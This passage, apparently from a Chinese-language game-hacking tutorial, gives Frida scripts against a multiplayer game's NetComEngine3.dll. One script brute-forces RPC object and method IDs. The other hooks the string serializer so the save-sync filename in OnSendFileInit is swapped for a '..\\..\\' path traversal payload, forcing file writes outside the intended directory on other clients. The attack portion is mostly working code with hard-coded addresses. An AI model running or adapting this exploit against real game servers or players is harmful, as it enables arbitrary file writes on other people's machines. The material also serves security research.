const classToMethod = Module.getExportByName(‘NetComEngine3.dll’, ‘ClassToMethodName’); const targetName = Module.getExportByName(‘NetComEngine3.dll’, ‘TargetName’);

function tryID(objID, methodID) { const method = new NativeFunction(classToMethod, ‘pointer’, [‘pointer’, ‘uint’]); const target = new NativeFunction(targetName, ‘pointer’, [‘pointer’]); const buf = Memory.alloc(Process.pointerSize); buf.writeU32(objID); const m = method(buf, methodID); if (!m.isNull()) { const t = target(buf); console.log(objID.toString(16), ‘=’, t.readUtf16String()); console.log(’ -’, methodID, ‘=’, m.readUtf16String()); } }

for (let obj = 0; obj < 0x9000000; obj += 0x400000) { for (let meth = 0; meth < 0x40; meth++) { tryID(obj, meth); } }

</details>

运行 `frida -l explore-surface.js Addon.exe` 发出了完整的 RPC 映射，包括 `Player` 对象 (`0x7400000`) 及其文件传输动词 `OnSendFileInit`、`OnSendFileData`、`OnReceivedFileData` 和 `OnCancelSendFile`。同样的工作流适用于任何暴露内部反射助手的二进制协议：拦截 dispatcher、brute-force IDs，并记录引擎已知的每个可调用方法的信息。

### 提示

- 使用引擎自带的日志缓冲区（本例中为 `WString::Format`）以避免重写未记录的字符串编码。
- 在尝试 fuzzing 之前 dump `Flags` 以识别可靠性特性（ACK、resend requests）；自定义 UDP stacks 通常会静默丢弃格式错误的数据包。
- 保存枚举出的映射 —— 它可作为 fuzzing 语料，并能清楚显示哪些对象操作 filesystem、world state 或 in-game scripting。

## 滥用文件传输 RPCs

多人游戏存档同步使用了一个两包握手：

1. `OnSendFileInit` — 携带客户端在保存接收负载时应使用的 UTF‑16 文件名。
2. `OnSendFileData` — 以固定大小的分块流式传输原始文件内容。

因为服务器在发送之前通过 `ByteStreamWriteString()` 序列化文件名，所以可以在 Frida hook 中替换指向 traversal payload 的指针，同时保持数据包大小不变。

<details>
<summary>文件名替换器</summary>
```javascript
const writeStr = ptr('0x1003A250');
const ByteStreamWriteString = new NativeFunction(writeStr, 'pointer', ['pointer', 'pointer']);
const evil = Memory.allocUtf16String('..\\..\\..\\..\\Sauvegarde.sww');

Interceptor.attach(writeStr, {
onEnter(args) {
const src = args[1].readPointer();
const value = src.readUtf16String();
if (value && value.indexOf('Sauvegarde.sww') !== -1) {
args[1].writePointer(evil);
}
}
});